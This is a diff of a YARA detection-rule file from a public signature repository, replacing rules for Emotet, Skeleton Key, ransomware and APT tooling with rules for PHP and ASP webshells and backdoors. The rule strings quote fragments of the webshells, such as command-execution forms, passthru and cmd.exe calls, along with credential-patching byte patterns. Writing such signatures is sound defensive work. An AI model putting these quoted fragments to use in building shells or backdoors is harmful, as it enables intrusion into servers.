-		logic_hash = "23ffcdde3eae7637e5b47a0f940cbebafccfd4c3f222b882e73d7d02447b83c3"
+		hash = "9ea82afb8c7070817d4cdf686abe0300"
+		logic_hash = "0a51f15bfb4289dcb70e1e0b96d100be12901ebf26ed9c0e543eda5f4aa91f1c"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "e7c22ccdb1103ee6bd15c528270f56913bb2f47345b360802b74084563f1b73d"
+		tags = ""
 
 	strings:
-		$op0 = { 74 60 8d 34 18 eb 54 03 c3 50 ff 15 18 08 41 00 }
-		$op1 = { 03 fe 66 39 07 0f 85 2a ff ff ff 8b 4d f0 6a 20 }
-		$op2 = { 8b 7d fc 0f 85 49 ff ff ff 85 db 0f 84 d1 }
+		$s0 = "<td>Nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input typ"
+		$s2 = "D7nD7l.km4snk`JzKnd{n_ejq;bd{KbPur#kQ8AAA==^#~@%>></td><td><input type=\"submit"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize <= 200KB and ( pe.imphash ( ) == "009889c73bd2e55113bf6dfa5f395e0d" or 1 of them )
+		1 of them
 }
-rule SIGNATURE_BASE_MAL_Emotet_BKA_Quarantine_Apr21
+rule SIGNATURE_BASE_Dxshell_Php_Php
 {
 	meta:
-		description = "No description has been set in the source file - Signature Base"
-		author = "press inquiries <info@bka.de>, technical contact <info@mha.bka.de>"
-		id = "22c27d82-00cb-5d2f-a1cc-9f8b4c60aecd"
-		date = "2021-03-23"
-		modified = "2023-12-05"
-		reference = "https://www.bka.de/DE/IhreSicherheit/RichtigesVerhalten/StraftatenImInternet/FAQ/FAQ_node.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_emotet.yar#L39-L52"
+		description = "Semi-Auto-generated  - file DxShell.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "b89930b7-acf3-5078-8429-d59e27e4b00c"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4397-L4408"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "cc75be5f641e21446a41bf9cc855330a612847e7e3a3be935577d33195f40d05"
+		hash = "33a2b31810178f4c2e71fbdeb4899244"
+		logic_hash = "821f9295eba6119ad08349e769d1909cd7836b4e35795915e94095cf715dc6e5"
 		score = 75
 		quality = 85
 		tags = ""
-		descripton = "The modified emotet binary replaces the original emotet on the system of the victim. The original emotet is copied to a quarantine for evidence-preservation."
-		note = "The quarantine folder depends on the scope of the initial emotet infection (user or administrator). It is the temporary folder as returned by GetTempPathW under a filename starting with UDP as returned by GetTempFileNameW. To prevent accidental reinfection by a user, the quarantined emotet is encrypted using RC4 and a 0x20 bytes long key found at the start of the quarantined file (see $key)."
-		sharing = "TLP:WHITE"
 
 	strings:
-		$key = { c3 da da 19 63 45 2c 86 77 3b e9 fd 24 64 fb b8 07 fe 12 d0 2a 48 13 38 48 68 e8 ae 91 3c ed 82 }
+		$s0 = "print \"\\n\".'Tip: to view the file \"as is\" - open the page in <a href=\"'.Dx"
+		$s2 = "print \"\\n\".'<tr><td width=100pt class=linelisting><nobr>POST (php eval)</td><"
 
 	condition:
-		$key at 0
+		1 of them
 }
-rule SIGNATURE_BASE_MAL_Emotet_BKA_Cleanup_Apr21 : FILE
+rule SIGNATURE_BASE_S72_Shell_V1_1_Coding_Html
 {
 	meta:
-		description = "No description has been set in the source file - Signature Base"
-		author = "press inquiries <info@bka.de>, technical contact <info@mha.bka.de>"
-		id = "10d93918-8a5e-54a3-81c6-f6ff68562e13"
-		date = "2021-03-23"
-		modified = "2023-12-05"
-		reference = "https://www.bka.de/DE/IhreSicherheit/RichtigesVerhalten/StraftatenImInternet/FAQ/FAQ_node.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_emotet.yar#L54-L70"
+		description = "Semi-Auto-generated  - file s72 Shell v1.1 Coding.html.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "dfd3b80e-6245-5f74-9d6a-6006218891ac"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4409-L4421"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "533adaed96d015ea2dcd54d5aaf9e71b5b70430ed5733a98618925cf978a6515"
+		hash = "c2e8346a5515c81797af36e7e4a3828e"
+		logic_hash = "aef8840b72e5c435c11150007d6b3af2943126fefdc6df343d0f73755340e260"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		descripton = "This rule targets a modified emotet binary deployed by the Bundeskriminalamt on the 26th of January 2021."
-		note = "The binary will replace the original emotet by copying it to a quarantine. It also contains a routine to perform a self-deinstallation on the 25th of April 2021. The three-month timeframe between rollout and self-deinstallation was chosen primarily for evidence purposes as well as to allow remediation."
-		sharing = "TLP:WHITE"
+		tags = ""
 
 	strings:
-		$key = { c3 da da 19 63 45 2c 86 77 3b e9 fd 24 64 fb b8 07 fe 12 d0 2a 48 13 38 48 68 e8 ae 91 3c ed 82 }
+		$s0 = "Dizin</font></b></font><font face=\"Verdana\" style=\"font-size: 8pt\"><"
+		$s1 = "s72 Shell v1.0 Codinf by Cr@zy_King"
+		$s3 = "echo \"<p align=center>Dosya Zaten Bulunuyor</p>\""
 
 	condition:
-		filesize > 300KB and filesize < 700KB and uint16( 0 ) == 0x5A4D and $key
+		1 of them
 }
-rule SIGNATURE_BASE_Skeleton_Key_Patcher
+rule SIGNATURE_BASE_Kacak_Asp
 {
 	meta:
-		description = "Skeleton Key Patcher from Dell SecureWorks Report http://goo.gl/aAk3lN"
-		author = "Dell SecureWorks Counter Threat Unit"
-		id = "a2805cce-7605-58a4-85ce-9dff5586858e"
-		date = "2015-01-13"
-		modified = "2023-12-05"
-		reference = "http://goo.gl/aAk3lN"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_skeletonkey.yar#L3-L24"
+		description = "Semi-Auto-generated  - file kacak.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "1ae15174-b84a-5826-b768-7afed65196db"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4422-L4435"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "451b77152e38a120bd8d8a832f0f7c003974113ead18aabfe043a332fb1f484c"
-		score = 70
+		hash = "907d95d46785db21331a0324972dda8c"
+		logic_hash = "8542a3985dff2d1eb42f4d2c9f30405a4817a8e30075225c518ec52381f1f7df"
+		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$target_process = "lsass.exe" wide
-		$dll1 = "cryptdll.dll"
-		$dll2 = "samsrv.dll"
-		$name = "HookDC.dll"
-		$patched1 = "CDLocateCSystem"
-		$patched2 = "SamIRetrievePrimaryCredentials"
-		$patched3 = "SamIRetrieveMultiplePrimaryCredentials"
+		$s0 = "Kacak FSO 1.0"
+		$s1 = "if request.querystring(\"TGH\") = \"1\" then"
+		$s3 = "<font color=\"#858585\">BuqX</font></a></font><font face=\"Verdana\" style="
+		$s4 = "mailto:BuqX@hotmail.com"
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Skeleton_Key_Injected_Code
+rule SIGNATURE_BASE_PHP_Backdoor_Connect_Pl_Php
 {
 	meta:
-		description = "Skeleton Key injected Code http://goo.gl/aAk3lN"
-		author = "Dell SecureWorks Counter Threat Unit"
-		id = "29daaffa-cd9d-55d3-b79d-cde1c76e9e45"
-		date = "2015-01-13"
-		modified = "2023-12-05"
-		reference = "http://goo.gl/aAk3lN"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_skeletonkey.yar#L26-L46"
+		description = "Semi-Auto-generated  - file PHP Backdoor Connect.pl.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "96c9258e-3894-5ee9-b52c-eb7ba7454416"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4436-L4448"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e87cb9a49d0df6f75ca1ae51f8255ea476b699e82d525d7eca06bfda3462d84b"
-		score = 70
+		hash = "57fcd9560dac244aeaf95fd606621900"
+		logic_hash = "b141546f45767884f9c8b1cc4c09ea25f90c0f3a3633bfeecad78b60e7f20306"
+		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$injected = { 33 C0 85 C9 0F 95 C0 48 8B 8C 24 40 01 00 00 48 33 CC E8 4D 02 00 00 48 81 C4 58 01 00 00 C3 }
-		$patch_CDLocateCSystem = { 48 89 5C 24 08 48 89 74 24 10 57 48 83 EC 20 48 8B FA 8B F1 E8 ?? ?? ?? ?? 48 8B D7 8B CE 48 8B D8 FF 50 10 44 8B D8 85 C0 0F 88 A5 00 00 00 48 85 FF 0F 84 9C 00 00 00 83 FE 17 0F 85 93 00 00 00 48 8B 07 48 85 C0 0F 84 84 00 00 00 48 83 BB 48 01 00 00 00 75 73 48 89 83 48 01 00 00 33 D2 }
-		$patch_SamIRetrievePrimaryCredential = { 48 89 5C 24 08 48 89 6C 24 10 48 89 74 24 18 57 48 83 EC 20 49 8B F9 49 8B F0 48 8B DA 48 8B E9 48 85 D2 74 2A 48 8B 42 08 48 85 C0 74 21 66 83 3A 26 75 1B 66 83 38 4B 75 15 66 83 78 0E 73 75 0E 66 83 78 1E 4B 75 07 B8 A1 02 00 C0 EB 14 E8 ?? ?? ?? ?? 4C 8B CF 4C 8B C6 48 8B D3 48 8B CD FF 50 18 48 8B 5C 24 30 48 8B 6C 24 38 48 8B 74 24 40 48 83 C4 20 5F C3 }
-		$patch_SamIRetrieveMultiplePrimaryCredential = { 48 89 5C 24 08 48 89 6C 24 10 48 89 74 24 18 57 48 83 EC 20 41 8B F9 49 8B D8 8B F2 8B E9 4D 85 C0 74 2B 49 8B 40 08 48 85 C0 74 22 66 41 83 38 26 75 1B 66 83 38 4B 75 15 66 83 78 0E 73 75 0E 66 83 78 1E 4B 75 07 B8 A1 02 00 C0 EB 12 E8 ?? ?? ?? ?? 44 8B CF 4C 8B C3 8B D6 8B CD FF 50 20 48 8B 5C 24 30 48 8B 6C 24 38 48 8B 74 24 40 48 83 C4 20 5F C3 }
+		$s0 = "LorD of IRAN HACKERS SABOTAGE"
+		$s1 = "LorD-C0d3r-NT"
+		$s2 = "echo --==Userinfo==-- ;"
 
 	condition:
-		any of them
+		1 of them
 }
-rule SIGNATURE_BASE_SUSP_RANSOMWARE_Indicator_Jul20 : FILE
+rule SIGNATURE_BASE_Antichat_Socks5_Server_Php_Php
 {
 	meta:
-		description = "Detects ransomware indicator"
-		author = "Florian Roth (Nextron Systems)"
-		id = "6036fdfd-8474-5d79-ac75-137ac2efdc77"
-		date = "2020-07-28"
-		modified = "2023-12-05"
-		reference = "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_ransom_generic.yar#L2-L35"
+		description = "Semi-Auto-generated  - file Antichat Socks5 Server.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "35d0930c-ef07-5fd4-9d7a-c0d685f92339"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4449-L4461"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3dd1b29f45afba16d58619416e0d420acd38fb8ae1fc846035229a27b9e5c9d9"
-		score = 60
+		hash = "cbe9eafbc4d86842a61a54d98e5b61f1"
+		logic_hash = "d6b203561f95f431b3d2c241011ae08c05619d45c5900a28137481c029e8297e"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6"
-		hash2 = "5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473"
-		hash3 = "6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306"
-
-	strings:
-		$ = "Decrypt.txt" ascii wide
-		$ = "DecryptFiles.txt" ascii wide
-		$ = "Decrypt-Files.txt" ascii wide
-		$ = "DecryptFilesHere.txt" ascii wide
-		$ = "DECRYPT.txt" ascii wide
-		$ = "DecryptFiles.txt" ascii wide
-		$ = "DECRYPT-FILES.txt" ascii wide
-		$ = "DecryptFilesHere.txt" ascii wide
-		$ = "DECRYPT_INSTRUCTION.TXT" ascii wide
-		$ = "FILES ENCRYPTED.txt" ascii wide
-		$ = "DECRYPT MY FILES" ascii wide
-		$ = "DECRYPT-MY-FILES" ascii wide
-		$ = "DECRYPT_MY_FILES" ascii wide
-		$ = "DECRYPT YOUR FILES" ascii wide
-		$ = "DECRYPT-YOUR-FILES" ascii wide
-		$ = "DECRYPT_YOUR_FILES" ascii wide
-		$ = "DECRYPT FILES.txt" ascii wide
+		tags = ""
+
+	strings:
+		$s0 = "$port = base_convert(bin2hex(substr($reqmessage[$id], 3+$reqlen+1, 2)), 16, 10);" fullword
+		$s3 = "#   [+] Domain name address type"
+		$s4 = "www.antichat.ru"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1400KB and 1 of them
+		1 of them
 }
-rule SIGNATURE_BASE_HKTL_Redmimicry_Agent
+rule SIGNATURE_BASE_Antichat_Shell_V1_3_Php
 {
 	meta:
-		description = "matches the RedMimicry agent executable and payload"
-		author = "mirar@chaosmail.org"
-		id = "a4d4ec77-4a0d-5afd-9181-85433e8b5fda"
-		date = "2020-06-22"
-		modified = "2023-01-06"
-		reference = "https://redmimicry.com"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_redmimicry.yar#L2-L26"
+		description = "Semi-Auto-generated  - file Antichat Shell v1.3.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "856cf977-24da-58e0-b6d2-820c92075ecc"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4462-L4474"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "645da2764ca911c4aae80b90622d2c61933dee929403858fc49f7bc0d44300c6"
+		hash = "40d0abceba125868be7f3f990f031521"
+		logic_hash = "566c324f3bf44ce9f32ddad82a8d3daa87a8a75b5ca0c8286bc912a8ae4ac8e9"
 		score = 75
 		quality = 85
 		tags = ""
-		sharing = "tlp:white"
 
 	strings:
-		$reg0 = "HKEY_CURRENT_USER\\" ascii
-		$reg1 = "HKEY_LOCAL_MACHINE\\" ascii
-		$reg2 = "HKEY_CURRENT_CONFIG\\" ascii
-		$reg3 = "HKEY_CLASSES_ROOT\\" ascii
-		$cmd0 = "C:\\Windows\\System32\\cmd.exe" ascii fullword
-		$lua0 = "client_recv" ascii fullword
-		$lua1 = "client_send" ascii fullword
-		$lua2 = "$LuaVersion: " ascii
-		$sym0 = "VirtualAllocEx" wide fullword
-		$sym1 = "kernel32.dll" wide fullword
+		$s0 = "Antichat"
+		$s1 = "Can't open file, permission denide"
+		$s2 = "$ra44"
 
 	condition:
-		all of them
+		2 of them
 }
-rule SIGNATURE_BASE_HKTL_Redmimicry_Winntiloader
+rule SIGNATURE_BASE_Safe_Mode_Bypass_PHP_4_4_2_And_PHP_5_1_2_Php
 {
 	meta:
-		description = "matches the Winnti 'Cooper' loader version used for the RedMimicry breach emulation"
-		author = "mirar@chaosmail.org"
-		id = "a8be1377-faa0-560d-a12c-0369b1f91180"
-		date = "2020-06-22"
-		modified = "2023-01-10"
-		reference = "https://redmimicry.com"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_redmimicry.yar#L28-L59"
+		description = "Semi-Auto-generated  - file Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "3e81f628-31b4-5c22-943e-62c8cb4c0c4d"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4475-L4487"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d8ef457ac41a7c45cc7e97330bdd3de12eb3391c03d0a6a87ddc669c841c325d"
+		hash = "49ad9117c96419c35987aaa7e2230f63"
+		logic_hash = "d6d2a3999f2e8ceb70f57697c0a845edbbcfce0aba151ec6a0ac23f55265cd47"
 		score = 75
 		quality = 85
 		tags = ""
-		sharing = "tlp:white"
 
 	strings:
-		$s0 = "Cooper" ascii fullword
-		$s1 = "stone64.dll" ascii fullword
-		$decoding_loop = { 49 63 D0 43 8D 0C 01 41 FF C0 42 32 0C 1A 0F B6 C1 C0 E9 04 C0 E0 04 02 C1 42 88 04 1A 44 3B 03 72 DE }
+		$s0 = "Welcome.. By This script you can jump in the (Safe Mode=ON) .. Enjoy"
+		$s1 = "Mode Shell v1.0</font></span>"
+		$s2 = "has been already loaded. PHP Emperor <xb5@hotmail."
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_MAL_JS_Efile_Apr23_1
+rule SIGNATURE_BASE_Mysql_Php_Php
 {
 	meta:
-		description = "Detects JavaScript malware used in eFile compromise"
-		author = "Florian Roth"
-		id = "ba7a8b2c-789c-5bc5-be53-f2b92c7039e1"
-		date = "2023-04-06"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/Ax_Sharma/status/1643178696084271104/photo/1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_efile_apr23.yar#L2-L15"
+		description = "Semi-Auto-generated  - file mysql.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "41730336-0dce-5ed9-95b0-c911a4e3cb48"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4488-L4500"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6d94162e5719b92d9df349e7d48cd70e218998b0e120870a435a8073fa49c532"
+		hash = "12bbdf6ef403720442a47a3cc730d034"
+		logic_hash = "60e235310f378698ffcc3ae6a07ab5dd94a660ca4b1504cc878d9741f751d5d1"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$s1 = "let payload_chrome = "
-		$s2 = "else if (agent.indexOf(\"firefox"
+		$s0 = "action=mysqlread&mass=loadmass\">load all defaults"
+		$s2 = "if (@passthru($cmd)) { echo \" -->\"; $this->output_state(1, \"passthru"
+		$s3 = "$ra44  = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = "
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_MAL_PHP_Efile_Apr23_1
+rule SIGNATURE_BASE_Worse_Linux_Shell_Php
 {
 	meta:
-		description = "Detects malware "
-		author = "Florian Roth"
-		id = "d663b38e-b082-5cf7-9853-f4685bf3a87b"
-		date = "2023-04-06"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/malwrhunterteam/status/1642988428080865281?s=12&t=C0_T_re0wRP_NfKa27Xw9w"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_efile_apr23.yar#L18-L32"
+		description = "Semi-Auto-generated  - file Worse Linux Shell.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "e223e2a9-7c7a-597a-8b90-a63ee11805ea"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4501-L4512"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ec4ac3f5c19f506a70eacb5fe3173cc06bf20567bbc9a96f3b269910382e5fa2"
+		hash = "8338c8d9eab10bd38a7116eb534b5fa2"
+		logic_hash = "47801296b700e85f9e08857eb06f845ef8ed3f88b7d0de34d4b7c47cef6cc7fb"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$s1 = "mt_rand( 0, 0xffff ), mt_rand( 0, 0xffff )" ascii
-		$s2 = "C:\\\\ProgramData\\\\Browsers" ascii fullword
-		$s3 = "curl_https($api_url." ascii
+		$s1 = "print \"<tr><td><b>Server is:</b></td><td>\".$_SERVER['SERVER_SIGNATURE'].\"</td"
+		$s2 = "print \"<tr><td><b>Execute command:</b></td><td><input size=100 name=\\\"_cmd"
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_HKTL_EXPL_POC_Libssh_Auth_Bypass_CVE_2023_2283_Jun23_1 : CVE_2023_2283 FILE
+rule SIGNATURE_BASE_Cyberlords_Sql_Php_Php
 {
 	meta:
-		description = "Detects POC code used in attacks against libssh vulnerability CVE-2023-2283"
-		author = "Florian Roth"
-		id = "e72eba33-686f-5fca-bca3-2b875d1ec224"
-		date = "2023-06-08"
-		modified = "2023-12-05"
-		reference = "https://github.com/github/securitylab/tree/1786eaae7f90d87ce633c46bbaa0691d2f9bf449/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_libssh_cve_2023_2283_jun23.yar#L2-L15"
+		description = "Semi-Auto-generated  - file cyberlords_sql.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "41730336-0dce-5ed9-95b0-c911a4e3cb48"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4513-L4526"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4c3d54d7f4902c1da664e41096b5931e6534aaaf63243f12e05b81af63d8b28f"
-		score = 85
+		hash = "03b06b4183cb9947ccda2c3d636406d4"
+		logic_hash = "b3286f9fd86c90c5afc79801b6d65c9ae52ee1c37da93ff15461d84f37ef8019"
+		score = 75
 		quality = 85
-		tags = "CVE-2023-2283, FILE"
+		tags = ""
 
 	strings:
-		$s1 = "nprocs = %d" ascii fullword
-		$s2 = "fork failed: %s" ascii fullword
+		$s0 = "Coded by n0 [nZer0]"
+		$s1 = " www.cyberlords.net"
+		$s2 = "U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAAMUExURf///wAAAJmZzAAAACJoURkAAAAE"
+		$s3 = "return \"<BR>Dump error! Can't write to \".htmlspecialchars($file);"
 
 	condition:
-		uint16( 0 ) == 0x457f and all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Slingshot_APT_Spork_Downloader : FILE
+rule SIGNATURE_BASE_Cmd_Asp_5_1_Asp
 {
 	meta:
-		description = "Detects malware from Slingshot APT"
-		author = "Florian Roth (Nextron Systems)"
-		id = "21e02f78-40d8-5b56-b747-3f2a7a692259"
-		date = "2018-03-09"
-		modified = "2023-12-05"
-		reference = "https://securelist.com/apt-slingshot/84312/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_slingshot.yar#L11-L24"
+		description = "Semi-Auto-generated  - file cmd-asp-5.1.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "fc204ab8-892d-5435-a737-a185ca32e938"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4527-L4538"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5dac11c595d838cb6b5f1e548307ea79d119c890c54e954453cf1a264e1d14ed"
+		hash = "8baa99666bf3734cbdfdd10088e0cd9f"
+		logic_hash = "a41c83da1a65e67b6f4ac6ad7cc8702486957ab0c7dda658d071e603338c324b"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$s1 = "Usage: spork -c IP:PORT" fullword ascii wide
-		$s2 = "connect-back IP address and port number"
+		$s0 = "Call oS.Run(\"win.com cmd.exe /c del \"& szTF,0,True)" fullword
+		$s3 = "Call oS.Run(\"win.com cmd.exe /c \"\"\" & szCMD & \" > \" & szTF &" fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and 1 of them
+		1 of them
 }
-rule SIGNATURE_BASE_Slingshot_APT_Minisling : FILE
+rule SIGNATURE_BASE_Pws_Php_Php
 {
 	meta:
-		description = "Detects malware from Slingshot APT"
-		author = "Florian Roth (Nextron Systems)"
-		id = "99f9d5a1-b29f-52f7-9aec-02df4a51a756"
-		date = "2018-03-09"
-		modified = "2023-12-05"
-		reference = "https://securelist.com/apt-slingshot/84312/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_slingshot.yar#L26-L38"
+		description = "Semi-Auto-generated  - file pws.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "1ec47c33-dbec-50bd-b4b0-8f00b704a816"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4539-L4551"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7d370271fea6c607c051eb49681600b4f59878c2fd2d43d71194bddda78d7b09"
+		hash = "ecdc6c20f62f99fa265ec9257b7bf2ce"
+		logic_hash = "98dae8aab5bfd58f4264e318f5a5b5900b38687386f9d7f09c31da0f51d57bc0"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$s1 = "{6D29520B-F138-442e-B29F-A4E7140F33DE}" fullword ascii wide
+		$s0 = "<div align=\"left\"><font size=\"1\">Input command :</font></div>" fullword
+		$s1 = "<input type=\"text\" name=\"cmd\" size=\"30\" class=\"input\"><br>" fullword
+		$s4 = "<input type=\"text\" name=\"dir\" size=\"30\" value=\"<? passthru(\"pwd\"); ?>"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and 1 of them
+		2 of them
 }
-rule SIGNATURE_BASE_Slingshot_APT_Ring0_Loader : FILE
+rule SIGNATURE_BASE_PHP_Shell_Php_Php
 {
 	meta:
-		description = "Detects malware from Slingshot APT"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b5301a45-a4ec-5e56-a990-bc6300ee6365"
-		date = "2018-03-09"
-		modified = "2023-12-05"
-		reference = "https://securelist.com/apt-slingshot/84312/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_slingshot.yar#L40-L58"
+		description = "Semi-Auto-generated  - file PHP Shell.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "6978126c-5414-52d2-b085-6e5589716d93"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
